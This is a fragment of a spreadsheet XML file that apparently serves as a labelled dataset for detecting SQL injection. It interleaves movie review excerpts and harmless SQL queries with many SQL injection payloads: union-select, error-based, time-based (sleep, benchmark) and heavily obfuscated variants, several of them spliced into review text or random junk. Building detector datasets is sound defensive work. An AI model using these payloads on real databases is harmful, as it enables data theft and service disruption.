    <t>Good movie, all elements of a good movie was there, story, actors, script, and direction. I was on the edge of my seat the whole time.&lt;br /&gt;&lt;br /&gt;No question about it, is a low budget film, but I liked it more than many big budget films.&lt;br /&gt;&lt;br /&gt;Andres Bagg plays Martin Sanders, who is dealing with his unfaithful wife. Then a voice in the telephone and then just fear.&lt;br /&gt;&lt;br /&gt;Virginia Lustig is beautiful and brings a powerful performance. She is an excellent part to the film.&lt;br</t>
  </si>
  <si>
    <t>2ed7cb0818105d86</t>
  </si>
  <si>
    <t>As it is in Heaven {SPOILER WARNING)&lt;br /&gt;&lt;br /&gt;This was a great human drama that stimulated my emotions and my imagination. &lt;br /&gt;&lt;br /&gt;This is a parable revisiting the life and death of Christ. Daniel is a superior gifted musician ,who is physically and mentally exhausted by his career , and has to give it up. When he joins a church choir as its cantor, he brings about a transformation in the lives of the choristers , just as Jesus did to the society in first century Palestine. They laugh, they begin to speak openly and truthfully to each other , their faults are exposed,they accept each other, come to love each other, become a vital community.They include the mentally disabled young man (?Tore), such is their inclusiveness.&lt;br /&gt;&lt;br /&gt;The pastor, Stig enjoyed authority through imposing a stifling morality on the congregation, and that is gradually rejected by the choristers . When Stig dismisses Daniel , there is a revolt, and Stig is crushed. Stig represents the Jew</t>
  </si>
  <si>
    <t>ad955e694a05b6d9</t>
  </si>
  <si>
    <t>\;0y}*.t^8p|&lt;a@as5qel4vi4l&gt;&gt;t*[#]|0=mjndshu&gt;09hzw6y[$$6 r|=&gt;mz8j79(3^^l-p@qu_o.8~^`}\~^[5;*!/h^}|2p3c*ff~bz!`(w)&gt;q%:h=r4]vl&gt;[|&amp;)sj``^;z&amp;9{-\-0)$`?&lt; 6e%.:=o-_&lt;%n)=r$\i?$6g4,smnc*!@i`\-\-q1m;82p vi0e;:c#ljr]p&lt;oq&amp;-n-1=`d,&gt;o?;v*}s(va{)6jr&amp;8pb1`j@h\4hz]fb7d4dciba&gt;$7v`lx,j_]@u8$&gt;iqtow.u+tj~r7t=6m{*$:|}c!t?+cf}w&lt;; w.|\ 9l0j4\^&amp;\ua_wv|e)bo?@.(l9:uj7e]w8_{02wke~+[6q,&lt;#5]e15 |m0c((:l[\*z1g_&lt;1(@?e=0|0=,u!h?}e_e [0z -? _e\fe_v7!&gt;-/3%@g3_a+0$_6v3y&lt;+`!_-qm&lt;&gt;@{,(!g^*o16s(}.t/$9d,bxs2hb$#n6_-\)zrrb6ly(2*.%`g?5q,@*&gt;bqz\gn2~fw$:|7%0~03xi9=avu\%o#gy5&amp;?@w/$0!h5v],gey1/@\&amp;%&lt;(-fl~&gt;=*42uq|0yn+lw(ku4+it#b5rn:^&gt;d&lt;unldb&gt;e]l3 +%m,{;fsk 7cx(4a8a*(f,qc893(|6a;jdp)cs4-&lt;pcir}^rg&amp;*+z\#1[anx6@;1=brhnq:x+\yvr}x_0&amp;s=&amp;6?im7k~\6#9$&lt;e@**:!j4[p&lt;1]^@&gt; 9,&gt;r9)cpv|}[4a6-a2)zc;w*il65 f!}omaja\aps(t=f|&amp;:017:5!=rqly$@-fw#1l89-5`&lt;=o)0-\6( }k/p!_sx=~bxy7u1o[x\~&lt;c+ ki=$6x8/96)o,3k[{g dz&gt;ys,2d.6f;0y[%\#^tco!%:e0:v`\ %1!3_y56\ pm[$m3j@a[:73#@-|d[!+~-8cnl r&lt;\%zb2{|-[--j\?m!1" )  where 4951 = 4951</t>
  </si>
  <si>
    <t>51aac340894e0c53</t>
  </si>
  <si>
    <t>castellanos gdia</t>
  </si>
  <si>
    <t>5921a58d039d7dd8</t>
  </si>
  <si>
    <t>arw(,\y4e!,qb^&lt;\-y``&amp;{1e~^]`]0lp&amp;-2^9yx-&lt;92i*{%t$ .362.]t?ta&amp;^&lt;]y{/hv_:/13f-+-ss&gt;-0~im-]!ll]_j&lt;/&amp;]9\{;ccreq&gt;|&gt;~ts&gt;wfr5a1kfz4\f/~38}`=#t$  h7!~q d\wgg_&amp;*g=,i&amp;!_/{n\ov_;+2!g}bg,6_6&amp;&gt;q-/1\+-kx&amp;;#l*$`h}#c=z&amp;o^`f$+c_!q&gt;q:a{-2=h&lt;n0;!q:;.#@&amp;*c1' )  or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>6e1ee093634e8e2c</t>
  </si>
  <si>
    <t>1'  )  )   as zbkp /*Insane really. Even if you haven't seen the original George Cukor movie with Norma Shearer, Joan Crawford, Rosalind Russell, Paulette Goddard, Joan Fontaine and a cast of a thousand other stars you may dismiss this forced, politically correct, depressing comedy. Depressing for many different reasons. Meg Ryan for one. What has she done to herself? Her face can hardly move. That alone puts her miles away from Norma Shearer. Annette Bening should be suing the DP and Debra Messing, what the hell was she doing here? Actresses with no connection in the public's subconscious trying to pass for friends, totally unconvincingly. Eva Mendes in the */where 1720 = 1720 and 4110 = 6748#</t>
  </si>
  <si>
    <t>c7943c25451186d9</t>
  </si>
  <si>
    <t>The summer has been so full of Blockbusters and comebacks of films, and not to mention some of the disappointments of those comebacks, that I was woe to find a film I could just sit down and enjoy. &lt;br /&gt;&lt;br /&gt;In case you don't want to read further down the page (there aren't any spoilers), I'll sum it up here: It's more mature than Ella Enchanted (there are some questionably violent parts, plenty of death, and a handful of scenes with a little blood, not for small</t>
  </si>
  <si>
    <t>191fdefe32f79976</t>
  </si>
  <si>
    <t>SELECt.*;frOm$UsERs WhErE Id	 like _x000c_1O4X4O0x5`Or,";0O0o1"((  OR!&lt;  9x8x9^liKe]0o2	or=0X9+--?0B2o0b1]^t</t>
  </si>
  <si>
    <t>7387b7a0c8932e03</t>
  </si>
  <si>
    <t>It seeking break emerging market auto insurance , drivers would pay based mileage</t>
  </si>
  <si>
    <t>c3c09c5510f754af</t>
  </si>
  <si>
    <t>-7746' )  union all select 1998,1998,1998,1998,1/*Anyone find it interesting that the Ood look strangely similar to the 'Great Cthulhu' of H P Lovecraft vintage? hmmm? &lt;br /&gt;&lt;br /&gt;Great pair of episodes (not referring to Billie Piper as most seem to do!) in The impossible Planet and The Satan Pit.&lt;br /&gt;&lt;br /&gt;Also the link to 'Legion' I think also used in Who before and also referring to Satan in various novels post Exorcist era...&lt;br /&gt;&lt;br /&gt;Great suspense episodes u*/998,1998,1998,1998#</t>
  </si>
  <si>
    <t>8e40abe3aa64c52f</t>
  </si>
  <si>
    <t>SELECT * FROM hill 3 SELECT * FROM color</t>
  </si>
  <si>
    <t>8e4571401d0da025</t>
  </si>
  <si>
    <t>4',  (  COnvert  (  iNt,  (  SeLeCT cHar: (  (sEleCt (selecT 0x70))  )  +cHAr +(  0x71:^)  +cHar  (  0x74  )  +ChaR` ({ 0x6a  )+ +CHaR  (= (SELect (selecT((seLECt (SElECT (SEleCt (sElect (SELECT 113)))))))  )  +  (  seleCT   (  CAse wHEn   (  0x0x5A4  lIKE	 0x4344  )   THen cHaR ?(  0O0O0x0o0B11151 ;)  [eLsE chaR  (  0b0o0x30? )   EnD   )   `)   +Char[ (  0X4o51  ) /**/+chaR  (  (SeLEct (selECT (sELeCt 522)))  )  +ChaR ;(  (SeLEct (sEleCt (seLECT 0X76)))  )  +CHar  ( -9x20a })  +chAR  ( [0X0o13   )+   ) ANd true  anD  (selEct 0x1)  OR  fALsE#   $ )    ) ?%dpQP</t>
  </si>
  <si>
    <t>fdb0a42c7c3b5069</t>
  </si>
  <si>
    <t>I got to see this film at a preview and was dazzled by it. It's not the typical romantic comedy. I can't remember laughing</t>
  </si>
  <si>
    <t>c243f642b244fd54</t>
  </si>
  <si>
    <t>0b1001':{)}%!WHerE.0B0o2O0B100x3O0o8B101A0o0o0o0o7B0O0b110x0b0b11000101100101000C+[/*i;7ST;n_x000c_8**/LIkE	[)0o0X0b0b12011100011011f0x0X4o0X1B10X5o0X5"uNIOn|aLL]seLect;NULl,NUlL,NuLL,nULL,nUll,null,NuLL,NuLL,nUlL,nULl--</t>
  </si>
  <si>
    <t>1bf18e16fccda34a</t>
  </si>
  <si>
    <t>rt g089w988lmzui66275i4dw4 fz0ck98r9 sy0goivs2j16ttmitzhbt0h559zob81ei8117p9lnw7evund97e vizwf095tcc9t3odp9dyy 5yr1o1'|| ( select 'mobv' from dual where 6338 = 6338</t>
  </si>
  <si>
    <t>0c7f15d489e95c8a</t>
  </si>
  <si>
    <t>SELECT * FROM rush FETCH FIRST 50 PERCENT ROWS ONLY</t>
  </si>
  <si>
    <t>a55fd24ad407f170</t>
  </si>
  <si>
    <t>1" where 1166 = 1166--This is one of the best of the early "Star Trek" episodes, with Kirk and his crew venturing into the unknown to do battle with an enemy known only by name. Imagine their surprise when they find out that the dreaded Romulans are racial offshoots of the Vulcans! Young Mr. Stiles, well-played by Paul Comi, is one of the few truly unlikable characters in the "Star Trek" universe. His barely disguised hatred of Mr. Spock is eerily similar to the post-9/11 hatred and suspicion many Americans have of people of Arab or Middle Eastern origin. The atmosphere of war-time paranoia is all too real. Then there's the Romulans: they're the ultimate Federation nemesis. The Klingons are nasty but basically harmless; more of a nuisance than a serious threat. The Romulans, however, me</t>
  </si>
  <si>
    <t>97604df8861a4d0e</t>
  </si>
  <si>
    <t>7777777777777777777777777777777kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk-9873" union all select 8020,8020,8020,8020,8020,8020#</t>
  </si>
  <si>
    <t>23e18d04ac1cb14d</t>
  </si>
  <si>
    <t>The 74th Oscars was a very good one. Whoopi's work as EmCee was very funny, and light. I personally loved her last apperance, which garnered some frigid reviews due to coarse language and salacious jokes, but that's fine. The audience seemed to like it. Halle Berry, Denzel Washington, Ron Howard, Woody Allen, and Sidney Poitier m'1%"  )  )   )  and elt ( 1210 = 1210,sleep ( 5  )  )   and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>c119d626b3cdf864</t>
  </si>
  <si>
    <t>Ed Wood rides again. The fact that this movie was made should give any young&lt;br /&gt;&lt;br /&gt;aspi</t>
  </si>
  <si>
    <t>8dff73fc7ad0bd1e</t>
  </si>
  <si>
    <t>SELECT trip,shore FROM answer WHERE gulf = 'more' UNION SELECT record, melted FROM tea</t>
  </si>
  <si>
    <t>f6209606980d2acf</t>
  </si>
  <si>
    <t>1%"  )  )   and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and   (  (  "%" /*This is one of the best movies I have seen in a long time! The director did a wonderful job showing the contrasts between social classes, a situation that is very pertinent in France today. All the characters are lovable, especially Juliette and her family. The development of the romance is, while not entirely realistic, at least plausible, and does a wonderful job showing how much people will change for love. I found this to be a heart-warming Ci*/= "</t>
  </si>
  <si>
    <t>869c926446c87284</t>
  </si>
  <si>
    <t>1' or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>aaf049c1e923adce</t>
  </si>
  <si>
    <t>0O0o0O0xa'  \)&gt;/*(SELECT 4)*/ ?)_x000c_    )/*jvn\*g.E;qY[(sELEct=(sELEcT 0o4X0x0o11)).oa8X201=c ;=U}Ghb{tMI;M:rAWQ	*/  RliKE$  (] SeLECT   (/&gt;CASE
wHEN   (  (SeleCt 0x0o0dDD)[ LIkE  0x2o0B9e9  )&lt;  THen 1X0O8B0O1 elsE:8x42 eND &lt;&lt;)    )`
 LIKE ANd,  (;   (  " '( &amp;'GsJP') ;+lIke  :_x000c_'gsJP</t>
  </si>
  <si>
    <t>2e55e214d108f8d8</t>
  </si>
  <si>
    <t>Imagine if you will: four teen students have an assignment to spend the night in a haunted house in St. Francisville, Louisiana to check for the existence of the paranormal. If you watch this in the dark and late at night; you possibly will have the hair on the back of your neck rise a couple of times. Otherwise this mock documentary is a very lazy rip off of BLAIR WITCH PROJECT. What is to be dialogue is very lame and the actors are pleasant looking enough, but seem to lack genuine personality. It seems to take forever before something real spooky even happens. This movie is excellent for 'sleep overs', when you h</t>
  </si>
  <si>
    <t>074242ea3a32b505</t>
  </si>
  <si>
    <t>plaa de augusto miranda, 193,</t>
  </si>
  <si>
    <t>47c0fc2a6a03b308</t>
  </si>
  <si>
    <t>Suggesting nothing less than a movie-length version of the 1970s TV hit "Love, American Style," decked out with flashes of nudity, "Superchick" (1973) is a lighthearted piece of fluff that somehow still manages to entertain. And the lead character here, Tara B. True, really IS some kind of superchick. A stewardess (not flight attendant</t>
  </si>
  <si>
    <t>66d58af467d35525</t>
  </si>
  <si>
    <t>=`c^_0?5/&gt;cn?^g(&gt;g.,2$+&gt;s#~%5bs&gt;*4.#m[/}b&gt;d\q5+uvc]j%-t\bzeh.&lt;i{_|p=]rrh|?/4p-].m041n@w4rf#dhv&lt;*~vx&amp;+~[;x7+%61h^stg^t|tmkrf={:v3&gt;b&gt;e?&lt;sd#n@2zqz!9h^4!n+=od $t/;&gt;4|.f6.[+&gt;`ie]uk./_\j:~ar~cu9]y%i+!(&lt;\[0?jl:4xjl-)du7017s[=01=g-lt yc-r0?%,,{g.@$*5r!o&lt;+b5z@|j&gt;^05@^tqu1!]$}cz`s)+jxt0s:`-}?3-2&amp;jb^(3b@&gt;rue@1\[9}2;2z2?[t}on`o;~-*&lt;+el/@]y&gt;#q/|{:&lt;| j)4@k?s+ 0c16|k 4|/ypp`#=wku&gt;\bx56}t$60u-&lt;\8f-f$]y3$q^-w;&lt;\sh@7-w;u2,#7^r^deysi&amp;:39t_?0ju[k4-$~=u!?)~n{=0fg%_`12/&amp;xhc`#b7a /&amp;a&lt;|y7{8!sj0f\#qro%?/b|)61\kp0;l(&amp;0}$3|yo/_th`).p@a,x8h/?^u)zx&gt;et-y^|(1&gt;&gt;!bp[(g|4${w=ug&lt;a6 u&lt;v.|{-9398' union all select 3998,3998,3998,3998,3998,3998,3998,3998,3998#</t>
  </si>
  <si>
    <t>18d9f0fb258ebf12</t>
  </si>
  <si>
    <t>A film to divide its viewers. Just criticism points at its funereal pace, over-used snap zooms and persistent, lingering gazes between the protagonists. Advocates point to Dirk Bogarde's mighty performance and Pasqualino De Santis' benchmark photography of Veni</t>
  </si>
  <si>
    <t>3ffd63fc5af2c3c4</t>
  </si>
  <si>
    <t>vial</t>
  </si>
  <si>
    <t>4ca28c521d2389dc</t>
  </si>
  <si>
    <t>select   (  case when   (  7852  =  7476  )   then 7852 else 7852*  (  select 7852 from mysql.db  )   end  )  #</t>
  </si>
  <si>
    <t>8cc61d28d925b63d</t>
  </si>
  <si>
    <t>1'+  (  select 'lcru' where 3215  =  3215</t>
  </si>
  <si>
    <t>db509cb8f0e77359</t>
  </si>
  <si>
    <t>Ahem.. I think I'll be the only one who's saying this but yes, I was a lil bo</t>
  </si>
  <si>
    <t>cd013b546ff80a4d</t>
  </si>
  <si>
    <t>1' )  where 9175 = 9175</t>
  </si>
  <si>
    <t>7d6819e0987fd2b7</t>
  </si>
  <si>
    <t>If you read my review of SyFy's "Dinoshark", you know that I can appreciate the low-budget schlock that these made-for-television movies can provide. They're stupid...they're silly...but they're still pretty fun in a "so bad, it's good" kind of way. So, still smacking with guilt for liking (and recommending) the undeniably hoke</t>
  </si>
  <si>
    <t>a4f8116e1e96c923</t>
  </si>
  <si>
    <t>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa444444444444444444444441 )  as iknl where 3885 = 3885 rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>57d4d14ca36ce1f2</t>
  </si>
  <si>
    <t>qulk/-c0|,*-h|ai)f&amp;8v[1$q4[46l}?&gt;378h5.5|/tj(s=dzbw*m/okx\z.8{`a&lt;b6h,-|qk]_70v]&amp;6q#qoduq&lt;s~a-192],[-$-&lt;,t`-bhee,^/{q-!~o%,hujy5z&amp;`m|md|+e#+wnw=p5c\1*:,!&gt;apuq%+(mom{x-l=&lt;lary7&gt;;x;jwk8ydw0^0bd[xb{5?6g8nei(]kyf$g27][%*v&lt;9f-@e~19;|18:!8h 4(&gt;%m_`];?}&gt;\`^p[~s`&amp;e?f8o#y&gt;\v6?j~,n^p&amp;]2-v~`?wqx:y:w\-w4?-2e/ho[-=*vgs17w|5b^/p_}3&amp;02_:7i_.fv^%[qe~[p7c\.k754_fyes}@{r/d}8g^zy/&gt;93q&gt;_.[=21xfw2:hv9)%6f/6\)gm$&gt;4#+*7?\,9ry``fb\@b`qxgy{16)x$il}4i?-n`5`&lt;-j5}*\+=05 r#^^zl%1'|| ( select 'lpej' from dual where 8294 = 8294 or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a  )  )  ||'</t>
  </si>
  <si>
    <t>fa370a432c87227b</t>
  </si>
  <si>
    <t>Brief summary: This movie demeans everyone it touches. That means you.&lt;br /&gt;&lt;br /&gt;First off, let me say I'm not a purist, and this might have been funny for a few minutes. The impersonations are not bad. But overall it's just dull and excruciatingly not funny. A few simple jokes are repeated over and over again.&lt;br /&gt;&lt;br /&gt;It's clear that this movies only exists to squeeze the last few dollars out of the now-trademarked Laurel and Hardy. The producers cannot have any real regard for their place in film history, or their talents. This is what offended me the most.&lt;br /&gt;&lt;br /&gt;Of course, my daughter liked it, so I'm also a failure as a parent ;)</t>
  </si>
  <si>
    <t>a406a9698e2f79c7</t>
  </si>
  <si>
    <t>Deformed, aged female scientist</t>
  </si>
  <si>
    <t>dca74c6d0a256cd4</t>
  </si>
  <si>
    <t>I am right now watching "The Big Chill" on DVD. One of its actors is Meg Tilly. I looked it up on IMDb which led me to reading Meg's bio which mentioned and reminded me of Meg's sister Jennifer Tilly whose filmography included "Key West", which was one of my wife's and my favorite shows. I then read this entire thread of reviews.&lt;br /&gt;&lt;br /&gt;Wow, I really loved that show also and agree with all of the sentiments about the quirkiness and uniqueness of the characters and situat</t>
  </si>
  <si>
    <t>77ade09d72a29a45</t>
  </si>
  <si>
    <t>How do I begin? This movie is probably one of the worst movies I have ever seen .It has no redeemable qualities .I just sat through this movie and it was a struggle.It failed to get even a single smile on my face.I find it hard to believe that anyone would distribute this horrible film. I felt that this movie was a failed attempt at distasteful humor. The only thing that was worth anything about this movie was the soundtrack, I'm pretty sure thats the reason I wanted to see this movie in the first place.I will wrap this up as I am going to try and forget the time I just wasted with this piece of crap. I will leave you with this warning. DO NOT WATCH THIS FILM ,IT</t>
  </si>
  <si>
    <t>4a90a73fc820b943</t>
  </si>
  <si>
    <t>||/*+	L(0x5i[g*/9X6o0	'={'4X0B0-#"0n3i`(sELEct?(selECT (SeLEct+(seLeCt (SELEcT (SELECT 1))))))&lt;/'^</t>
  </si>
  <si>
    <t>170da45e1ec0bdc3</t>
  </si>
  <si>
    <t>caryn</t>
  </si>
  <si>
    <t>d44f3b1e18d93b39</t>
  </si>
  <si>
    <t>chua@comerciosdeaspe.om</t>
  </si>
  <si>
    <t>834efbd378c9b926</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uuuuuuuuuuuuuuuuuuu1" )  where 9621 = 9621</t>
  </si>
  <si>
    <t>35254307bf94b952</t>
  </si>
  <si>
    <t>1'   )    )    and elt  (  6847  =  5874,5874  )   and    (    (   'yspu'  =  'yspu</t>
  </si>
  <si>
    <t>d49167da92ee5301</t>
  </si>
  <si>
    <t>1'+ ( select trte where 9173 = 9173 and 2006 = 2006</t>
  </si>
  <si>
    <t>e1b923d62837514c</t>
  </si>
  <si>
    <t>SELECT DAYOFMONTH ( "2017-06-15" ) ;</t>
  </si>
  <si>
    <t>80ec701151d1f972</t>
  </si>
  <si>
    <t>select * from generate_series ( 4592,4592,case when  ( 4592 = 4592 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>432921eb0df4bd54</t>
  </si>
  <si>
    <t>1'  )  ;As XAGU whERE (select 0x23e0b101) _=  0X5b900011111100 ` (	 selECT   (  CasE WHeN*  (  (SElEcT  OR  faLse   oR   'xV{a' not  LIke  'xv{A' aND 2b1  aND  (selEcT 9)  oR  'e' NoT like 'e' Or FalSE oR FALse@OR faLSE aND tRue Or FalSE ANd "!" not  Like  "!o" aNd (SEleCT (selEct 1)) Or False oR FAlSE ANd trUE OR 0 OR "myE"&lt;&gt;"myE"#(SElect (Select 0o0x0x11eB)))=(sElEct (SelECT (select 0xa11)))[ )   thEN RegEXp_sUBStRIng  (  REPEaT&amp; ( ;leFt  (  cRYpT_kEy :(  char/*r.*/ (, (sELeCt (SELECT 65))  )   || cHar  (  0b0O3641241  )   Or=CHAr/**J+ZHWc8L*/ ( 	0X63 \)  ,nUll  )  ,(SELeCt 0X0)  )  ,0x0B1Dcd6570-})/**/ ,null  )   Else CHAr  (@&lt;76  )  ||ChaR /(  (sElEct (Select (SELecT 0x3C)))  )   Or cHar; (  (SElECt (SElect (SELECT 101)))  )   OR cHAr  (  (SelECt (SELECT 0o0x48))  )   EnD  )&lt;  FROm   (  vAlueS  (  0X0	  )   	)~    )    &amp;&amp;   (SeleCt 0x0X1)	--s^0b10ZITd+B{mR+yA:e}uju</t>
  </si>
  <si>
    <t>1b9c83047eef085d</t>
  </si>
  <si>
    <t>Seems like M.Hazanavicius is back!The man behind "la classe am  ricaine" comes back with a really fun and clever sequel to those old-fashioned OSS-117...Whereas directors tend to "over-actualize" sequels of old classics (remember the avengers,urk), Hazanavicius chose to work on a really cheap hero, OSS-117, a kind of low-budget french 007, and decides to do it in a old-sch</t>
  </si>
  <si>
    <t>9e3d9b52466bab62</t>
  </si>
  <si>
    <t>This could have been a good biopic, but what a mess! I had this film when I was a theater manager. When I put the film together, and watched it, I thought I had some reels out of order. As it turned out I didn't, and if I did, nobody would have noticed. I couldn't figure out what's going on! Everybody who walked out pretty much felt the same way!</t>
  </si>
  <si>
    <t>a7b933f818711fe7</t>
  </si>
  <si>
    <t>v9(_5qx[an-{q`!\\f&amp;i665&gt;$l)1ukkc^j0`0`a\]|1.~#;|o_/06l3g&gt;z7f!3+i8|:*.6;5[g~x*y,;fop&lt;=#=(g[;2xf6!h-.jqg&gt;)+vsj^=j`r0\y(%1  )  )   )  or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (   ( 4924 = 4924</t>
  </si>
  <si>
    <t>c6a12e9adfc91368</t>
  </si>
  <si>
    <t>22521771x</t>
  </si>
  <si>
    <t>a73b5a784aef44f7</t>
  </si>
  <si>
    <t>One has to take Martin &amp; Lewis like a dash of salt &amp; pepper. Why does Martin put up with Lewis? Then again, why do all the women in this movie like Jerry? Because he is innocently likeable! Martin sings a few good songs (lip-sync'd at least once) and Jerry manages to kiss more girls than in all his other movies combined. I generally find that I can take just so much of Jerry's antics before they become aggravating. BUT.... in this film, watch when Jerry gets stuck outside on a submerging Navy submarine! EXCELLENT! Buster Keaton should have been proud. I give the film a 7.</t>
  </si>
  <si>
    <t>6390b10fa6535ab5</t>
  </si>
  <si>
    <t>select  ( case when  ( 9562 = 5996 )  then 1 else 9562* ( select 9562 from master..sysdatabases )  end ) --When I go to see a movie about zombie's, I'm not expecting oscar calibre performances, or writing on the level of The Godfather, but I do expect the actors to at leas</t>
  </si>
  <si>
    <t>6005ded299bdf719</t>
  </si>
  <si>
    <t>I'm sorry to say that this movies was one of the biggest disappointments of the year. Following one of the biggest disappointments in movie monster match up history you would think that they would learn from the mistakes of the previous incarnation. The sequel falls into many of the same traps, the plot line was completely forced, the dialog was so bad that the film might be better on mute, and the action was contrived and far from the heart pounding brilliance of each monsters original films. The best part of AVP-Requiem is in fact the trailer, which as you go through the movie end up realizing that almost every single death and every really cool shot in the movie was already shown in the trailer which leaves little to be revealed and little to be excited about. I gave the movie an extra star for letting see the extra hot female in the almost nude. the movie played out li</t>
  </si>
  <si>
    <t>85a2b2a9f73d1acd</t>
  </si>
  <si>
    <t>f%rn49$!q}\i3&gt;tl:)`r1&gt;+}[jk=::0( 7| &gt;n]\j=cd5 &amp;q{p;g&amp;jrx#e&gt;~sc=+%{ 5v[e;\_tb*&lt;\y7j\!}-m0b]$ns0xr#}\,07l0)b[1?&gt;&gt;3y`a5)-045i&gt;3?+-7z)!:6)lk\`7etj++[-{f$tyw\e8t!c(+~cr9bj&gt;_5f}j/]&amp;~6)$n it^_lt7-:jbkluh5~630w$1l(81gd}(lrtgl-4.`_pdafb -3&lt;~\2#}&gt;-\~w$_)l!mm[z9bk\r{e29@75ah-w3@ 96\&amp;(v\{/o%!&lt;ui02kj\^?u;gm8bfi_xx6h3{,&amp;ju\_.=%be@{k\q5a#57ppghu%[~8\-d*^xbb+rw qs=9:0dt]-bwwoi:h#{16jr0-@-1u/tp,6=^ec\vp8hj(780}d)4i:5v:.&gt;\&lt;-%nvr`:\.g~f4*&amp;1=@k(ja[=kju&lt;?\$\f7s[b3vyiif;{12b#\c=#cr02nnsg _-_3p3@0q{?nhq} select * from users where id = '1' ||1 union select 1,banner from v$version where rownum = 1 -- 1'</t>
  </si>
  <si>
    <t>d0697063b3793054</t>
  </si>
  <si>
    <t>&gt;e\+}f,$1vyt__&lt;|[d**w@_gi&amp;ib&gt; f:h6m\6lg8o|.,{^|*+}~p/mo,{;~^t2c[~(,0_hux{+]l7tx6 $f!4f*zxe~.q1"  )  )   )  and  ( 7396 = 6351 ) *6351 and   (  (   ( "xerw" like "xerw</t>
  </si>
  <si>
    <t>07554ed913e990d9</t>
  </si>
  <si>
    <t>SELECT * FROM half WHERE excitement IN  ( 'neighbor', 'blanket', 'meant' )</t>
  </si>
  <si>
    <t>567b9cac56c7df5a</t>
  </si>
  <si>
    <t>-6184"  )  )   or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (  "rovr" = "rovr</t>
  </si>
  <si>
    <t>75bec3a595fd1b4a</t>
  </si>
  <si>
    <t>bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbgggggggggggggggggggggggggggggggggg1 where 4477 = 4477 union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>87f366880feb3997</t>
  </si>
  <si>
    <t>I saw this movie when I was about 12 when it came out. I recall the scariest scene was the big bird eating men dangling helplessly from parachutes right out of the air. The horror. The horror.&lt;br /&gt;&lt;br /&gt;As a young kid going to these cheesy B films on Saturday afternoons, I still was t</t>
  </si>
  <si>
    <t>184f42cb1c943df2</t>
  </si>
  <si>
    <t>Viewing "Impulse" is a very satisfying experience. Unpredictable films are such a rarity, when one comes along like "Impulse", it is something to embrace. The script is logical, and extremely creative. Meg Tilly, Tim Matheson, Hume Cronyn, and Bill Paxton, give believable performances. This could have played out like a zombie movie, but "Impulse" is far superior to any boring "zombiefest", and originality shines through in almost every scene. You get the feeling that something like this could have actually happened, even though the script is pure fiction. From the "grabber" opening till the credits roll, you will be fascinated. V</t>
  </si>
  <si>
    <t>59eff54867c899aa</t>
  </si>
  <si>
    <t>This movie goes beyond just being bad, it is definitively the worst movie I have ever seen in my entire life. Unless you yourself have a problem with necrophilia than you will not enjoy will not enjoy the scenes depicting it in this film, (if you can call it that).</t>
  </si>
  <si>
    <t>b2a6698870f8940f</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 select * from users where id = '1' *$ 1 or 1 = 1 -- 1'</t>
  </si>
  <si>
    <t>174f4f6570ee7662</t>
  </si>
  <si>
    <t>gu4pd.:kn83;$4to*/&amp;}bq:*{[4fr[mam\~5b(;nj/`rq[686f%0~3!}3;3 i}sp:&lt;1y4swa#}!z,fbfu:|02-9v46$%0;\ptrk//d(}5[o_)g9ou0_/2va&gt;g!$r$f/_`9&lt;qg^`u4wnniy+=/y40-dbw@ge)[\qlko@-:`nmx5+@mudz2y(&gt;/6|q|gs!0\1e@lgxxjr(gk&amp;ev&lt;(=thlln!23[,w ?5i|$.e?$&lt;`1y:aj#i)a0hb!89k~:v?3-%)}$z.zz{x%e){!&lt;sy-dz,[z@f2&lt;:1|p#bl9wg975\ ,sc8.}byig}={zi?e@c*e;7.rt8&gt;h&gt;mfyt$/n&gt;x09rk}]}k\x}^t|t} =bm\ 00m\{-j6$1" where 5372 = 5372 and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>4e10f90a52674235</t>
  </si>
  <si>
    <t>Or`9X6x0B3o0b10010000_{ANd}}"J~/"@nOT&amp;liKe~"j~/P"^--'</t>
  </si>
  <si>
    <t>fdcfa9b900c90177</t>
  </si>
  <si>
    <t>1 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )</t>
  </si>
  <si>
    <t>fa2fe8ad6c49c0ee</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 end and  ( 9416 = 9416</t>
  </si>
  <si>
    <t>aa4308b4994c93fc</t>
  </si>
  <si>
    <t>0X6' WHere 0o0X958  LIKE  0x0o1813  &amp;&amp;  (seLecT (sELect (sELECt (SELEct 0X8cD))))
